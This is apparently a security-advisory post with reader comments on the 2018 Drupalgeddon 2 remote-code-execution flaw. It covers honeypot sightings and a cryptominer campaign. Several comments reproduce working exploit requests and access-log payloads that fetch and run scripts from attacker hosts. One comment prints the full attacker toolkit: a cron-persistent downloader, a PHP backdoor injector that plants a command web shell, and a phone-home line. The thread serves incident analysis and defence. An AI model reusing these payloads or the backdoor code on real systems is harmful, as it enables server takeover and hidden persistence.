|
[Update: Now used to install Monero Miners. See below for details] Drupal announced a Remote Code Execution vulnerability affecting Drupal 7.x and 8.x on March 28 (https://www.drupal.org/sa-core-2018-002) Proof of concpet code appeared on github on April 12th. Quick testing on handler's honeypots indicate that it functions as advertised. Upgrade to 7.58 or 8.5.1 Scans/attemps are showing up in other Handlers' honeypots:
And here is a second exploit attempt, trying to identify vulnerable servers:
The payload pings a host where the hostname of the target is prefixed to the hostname to be pinged. This is sort of interesting as mu6fea.ceye.io is a wildcard DNS entry, and *.mu6fea.ceye.io appears to resolve to 118.192.48.48 right now. So the detection of who is "pinging" is made most likely via DNS. The authoritative name server for "ceye.io" is ns[12].hackernews.cc, which appears to belong to a Chinese security news site. Maybe they are working on a story to publish how many vulnerable systems there are, but actual exploitation of a vulnerability, even if somewhat benign, may be a step too far for a news story. Other payloads spotted so far: echo `whoami` Here is one installing the standard xmrig Monero miner. The exploit string (spaces added to allow for wrapping on small screens):
This decodes to: (http replaced with hxxp)
"i" is an installer script. It collects information about the system and makes itself persistent via an entry in the crontab:
It also download additional files:
the miner will then connect to port 6666 on u5evn7.if1j0ytgkypa.tk , which currently resolves to 207.246.113.230 and 144.202.37.130. |
Kevin Liston 292 Posts ISC Handler |
| Reply Subscribe |
Apr 13th 2018 4 months ago |
|
Please add reference to the origin research blog here https://research.checkpoint.com/uncovering-drupalgeddon-2/
10x |
Anonymous |
| Reply Quote |
Apr 13th 2018 4 months ago |
|
I'd like to contribute with these spotted payloads
echo "MrJoker" > hello.txt --9a3c9fb84c674844bcf0f0986b8890a1 Content-Disposition: form-data; name="mail[#type]"; filename="mail[#type]" markup --9a3c9fb84c674844bcf0f0986b8890a1 Content-Disposition: form-data; name="form_id"; filename="form_id" user_register_form --9a3c9fb84c674844bcf0f0986b8890a1 Content-Disposition: form-data; name="_drupal_ajax"; filename="_drupal_ajax" 1 --9a3c9fb84c674844bcf0f0986b8890a1 Content-Disposition: form-data; name="mail[#post_render][]"; filename="mail[#post_render][]" exec --9a3c9fb84c674844bcf0f0986b8890a1--\)) www.xxx.tld(/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax <http://www.xxx.tld(/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax> \(POST form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=wget -O config.php https://m-live.me/payload/sh.txt wget -O config.php https://m-live.me/payload/sh.txt |
Anonymous |
| Reply Quote |
Apr 13th 2018 4 months ago |
|
I can confirm we are seeing similar payloads at Pantheon. We are sanitizing and logging attempted exploits. I've also seen attempts to install Linux Miner GF which matched a known antivirus signature: https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Linux~Miner-GF/detailed-analysis.aspx
|
Anonymous |
| Reply Quote |
Apr 13th 2018 4 months ago |
|
The real questionis this, and i know it may be a tough pill to swallow... When are we as the victins in these massive bullshit exploits, going to be compensated by the coder or coders and companies who were just a little to eager to push out the newest iteration of their software without doing their due diligance in intrusion, bad actor, and erroneous input trials. They rely mainly on kind hearted geniuses who could be using their treasured finds for ill gain, but then put them on notice instead. For what? Where they(Drupal) given proper CVE notification... Did they sleep on it? I dont know,but unless software mfgr and websites who are responsible have consequences, this will be an every other week thing.
This kind of stuff irritates me... Websites that actively know there is a spoof site advertised on google adwords as the top level response, and just sit on it, was a recent issue for me. trusted ssl cert houses issuing malsites with one letter utf-8-ed from a legit high value site was the most recent "duh why do they even allow this to happen" as well. There are simple solutions to an only broadening playing field of ez exploitable code and blatantly open to whomever firmware hacks. Idk. People need to be held responsible, and white/grey hats need to stop releasing exploits to be used by some one who cant even code a simple hello world without a how to and faq... |
jACKtheRipper 55 Posts |
| Reply Quote |
Apr 13th 2018 4 months ago |
|
@jACK: None of the points that you mention applies in this case.
|
salvis 1 Posts |
| Reply Quote |
Apr 18th 2018 4 months ago |
|
Good morning,
Sorry for my long post, I hope this one may help ... I got one of my Drupal CMS bases website compromised during the night and got some alert, so I was abbe to follow the attack method, retrieve files and IP adress of some other compromised servers. First, server at IP address 193.106.30.90 was used to download files onto my server. Investigating on that server show that it hosts an Apache server serving the following files : apply_patch.sh: Bourne-Again shell script, ASCII text executable c: PHP script, ASCII text i: Bourne-Again shell script, ASCII text executable p: PHP script, ASCII text The "c" file seems to be used to "clean" some systems (dirty code ...) : <?php function find_php() { $f = shell_exec("find -type f -name '*.php' -ctime -10"); return array_map(function ($x) {return trim($x, "./");}, preg_split('/\s+/', trim($f))); } foreach (find_php() as $file) { if (basename($file) != basename(__FILE__)) { # fuck em echo basename($file) ."-". basename(__FILE__) . "\n"; //@unlink($file); } } ?> The "i" file is a basic downloader bash script : #!/bin/bash echo $1 (crontab -l ; echo "1 * * * * wget -O- repo-linux.com/a | bash -") | uniq | crontab - wget -O - repo-linux.com/p | URL=$1 php wget -O - 185.222.211.142/apply_patch.sh | sh - Interresting to see that the attacker execute the "p" file (see below) to comprimise the system with a backdoor (which let execute commands under the account the webserver is running, mostly www-data), and then patch the compromissed server in order to secure it's own access ! The "p" file is the Drupal-patcher that instal the backdoor (remote shell) : <?php $payload = '<?php if (isset($_GET["_cmd"])) die(passthru($_GET["_cmd"])); ?>'; function find_dirs() { $f = shell_exec("find . -type d -writable"); print_r($f); return array_map(function ($x) {return trim($x, "./");}, preg_split('/\s+/', trim($f))); } function find_php() { $f = shell_exec("find . -type f -name '*.php' -writable"); return array_map(function ($x) {return trim($x, "./");}, preg_split('/\s+/', trim($f))); } // Base url wants to be http://domain/drupal/ // base_path wants to be blsh/blah.php function infect($rel_path) { global $payload; $p = 0; $mtime = @filemtime($rel_path); if (!$atime = @fileatime($rel_path)) { $atime = $mtime = time(); } $file = @file_get_contents($rel_path); if ($file) { $p = strpos("?>", $file); } else { $file = ""; } $file = substr_replace($file, $payload, $p, 0); // echo $file; $f = fopen($rel_path, 'w'); $r = fwrite($f, $file); fclose($f); @chmod($rel_path, 0777); // $r = file_put_contents($rel_path, $file, LOCK_EX); if ($r > 0) { @touch($rel_path, $mtime, $atime); return $r; } } // Gritty // If ENV variable, then use that. function get_url($rel_path) { return get_base_url() . $rel_path; } function test_url($url, $shell = false) { $headers = get_headers($url); //echo print_r($headers, 1); if (!$shell) { // Check url for 200 if ($headers && strstr($headers[0], "200")) { return true; } } else { $r = @file_get_contents($url . '?_cmd=(echo+SkFCQkVSV09DSwo=|base64+-d)'); echo "out: $url $r"; if (strstr($r, "JABBERWOCK")) { return true; } } } function check_backdoor($file) { global $payload; if (strstr(@file_get_contents($file), $payload)) { return true; } return false; } $bad_dir = array(); function infect_file($file, $new = false) { global $bad_dir; $u = get_url($file); $i = pathinfo($file); $dir = $i['dirname']; foreach ($bad_dir as $k => $v) { if (strpos($dir, $k) === 0) { if ($bad_dir[$k] > 3) { return false; } } } echo "$file - $u:\n"; if (check_backdoor($file)) { echo "already backdoored\n"; return $u; } if ($new || test_url($u)) { echo "trying to backdoor..."; $r = infect($file); if ($r > 0) { echo "done!\nwrote " . $r . " bytes to " . $file . ". testing..."; if (test_url($u, true)) { echo "appears to work!\n"; return $u; } else { echo "doesn't seem to work...\n"; return false; } } } else { if (!isset($bad_dir[$i['dirname']])) { $bad_dir[$i['dirname']] = 1; } else { $bad_dir[$i['dirname']] += 1; } } } function find_and_infect() { $files = find_php(); echo "found " . (count($files) - 1) . " writable files\n"; foreach ($files as $file) { if (basename($file) == basename(__FILE__)) { break; } if ($url = infect_file($file)) { return $url; } } $dirs = find_dirs(); echo "found " . count($dirs) . " writable dirs\n"; foreach ($dirs as $dir) { $f = md5($dir) . ".php"; $file = $dir . '/' . $f; if ($url = infect_file($file, true)) { return $url; } else { //unlink($file); } } return false; } function get_base_url() { $url = getenv("URL"); if (!$url) { $info = pathinfo(parse_url($_SERVER['REQUEST_URI'])['path']); $url = (isset($_SERVER['HTTPS']) ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"] . $info['dirname'] . "/"; } return $url; } $url = find_and_infect(); $data = base64_encode($url); file_get_contents("http://repo-linux.com/log.php?log=$data"); ?> And finaly the "apply_patch.sh" file download official Drupal patches and apply them to the local system, once the backdoor has been inserted into the Drupal code : #!/usr/bin/env bash # Run the script from the Drupal installation path version=`find . -name "Drupal.php" -type f | xargs grep 'const VERSION' | awk -F\' '{print $2}'` if [ -z "$version" ]; then echo "[-] Unable to get the version of Drupal installation." exit 1 fi if [[ $version =~ ^7.*$ ]]; then echo "7.x version" patch_link="https://cgit.drupalcode.org/drupal/rawdiff/?h=7.x&id=2266d2a83db50e2f97682d9a0fb8a18e2722cba5" elif [[ $version =~ ^8.5.*$ ]]; then echo "8.5.x Version" patch_link="https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&id=5ac8738fa69df34a0635f0907d661b509ff9a28f" elif [[ $version =~ ^8.3.*$ ]]; then echo "8.3.x Version" patch_link="https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&id=5ac8738fa69df34a0635f0907d661b509ff9a28f" elif [[ $version =~ ^8.4.*$ ]]; then echo "8.4.x Version" patch_link="https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&id=5ac8738fa69df34a0635f0907d661b509ff9a28f" else echo "[-] We can't patch this version of Drupal: $version" exit 1 fi echo "[+] Drupal version: $version" echo "[+] Getting the patch from Drupal website..." curl -s "$patch_link" > patch_file echo "[+] Applying the patch" patch -p1 < ./patch_file To know if Your server is clean, You have to ask the JABBERWOCK ... (See upper into the code ...) I hope that this was intyerresting for You. Regards. |
Jean 7 Posts |
| Reply Quote |
Apr 20th 2018 3 months ago |
|
Dear readers,
Some more information found in my Apache2 access log file : Use them on your own Drupal CMS for educational purposes only ! 17/Apr/2018 11:48:33 "GET /?q=user/password&name[#suffix]=<?php if(@isset($_SERVER[HTTP_323F6])){@eval(base64_decode($_SERVER[HTTP_323F6]));}exit;?>&name[#markup]=sites/libasset.php&name[#type]=markup&name[#post_render][post]=file_put_contents HTTP/1.1" 200 8063 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" 17/Apr/2018 18:25:07 "POST /?q=user/password&name[#post_render][]=system&name[#type]=markup&name[#markup]=chmod 0644 ./sites/default/files/.htaccess;cp /dev/null ./sites/default/files/.htaccess;mkdir ./sites/default/files/temp/;wget -P ./sites/default/files/temp/ http://www.websedge.com/blog/wp-content/uploads/2017/01/example.sites.php;echo "@!!%@" HTTP/1.1" 200 8014 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36" 18/Apr/2018 19:22:35 "POST /?q=user/password&name[#post_render][]=system&name[#type]=markup&name[#markup]=echo ls -la | sh HTTP/1.1" 200 7855 "-" "python-requests/2.18.4" 18/Apr/2018 19:22:37 "POST /?q=user/password&name[#post_render][]=system&name[#type]=markup&name[#markup]=curl http://185.165.169.146/c.sh -o /tmp/r.sh || wget http://185.165.169.146/w.sh -O /tmp/r.sh HTTP/1.1" 200 7928 "-" "python-requests/2.18.4" 18/Apr/2018 19:22:39 "POST /?q=user/password&name[#post_render][]=system&name[#type]=markup&name[#markup]=sh /tmp/r.sh HTTP/1.1" 200 7846 "-" "python-requests/2.18.4" 20/Apr/2018 05:20:11 "POST /?q=user/password&name[#post_render][]=system&name[#markup]=wget -O- http://repo-linux.com/i|bash /dev/stdin http://www.camacte.com/&name[#type]=markup HTTP/1.1" 200 7885 "-" "Ruby" Regards. |
Jean 7 Posts |
| Reply Quote |
Apr 20th 2018 3 months ago |
|
Our site has updated to drupal 7.59 and the problem still exists.
Centos 7.3 / sw-nginx-1.11.1-centos7.17071211.x86_64 Suggestions ? Can you tell me which /tmp file it is using for the download ? They are using Python to submit the POST. I have tried to simulate the post by doesnt' work, any suggestions ? Any assistance would be appreciated. Below is just one example, have quite a few if needed. The logs indicate only a POST is being issued. OUR.com/logs/access_log:155.94.75.92 - - [20/Jun/2018:04:48:56 -0400] "POST /?q=user/password&name[%23post_render][]=passthru&name[%23markup]=wget%20-O%20/tmp/a.sh%20http://155.94.75.92/a.sh;%20sh%20/tmp/a.sh&name[%23type]=markup HTTP/1.0" 200 26615 "-" "Python-urllib/2.7" OUR.com/logs/access_log:155.94.75.92 - - [20/Jun/2018:04:48:56 -0400] "POST /?q=user/password&name[#post_render][]=passthru&name[#markup]=wget -O /tmp/a.sh http://155.94.75.92/a.sh; sh /tmp/a.sh&name[#type]=markup HTTP/1.0" 200 26615 "-" "Python-urllib/2.7" |
James 2 Posts |
| Reply Quote |
Jun 20th 2018 1 month ago |
Sign Up for Free or Log In to start participating in the conversation!
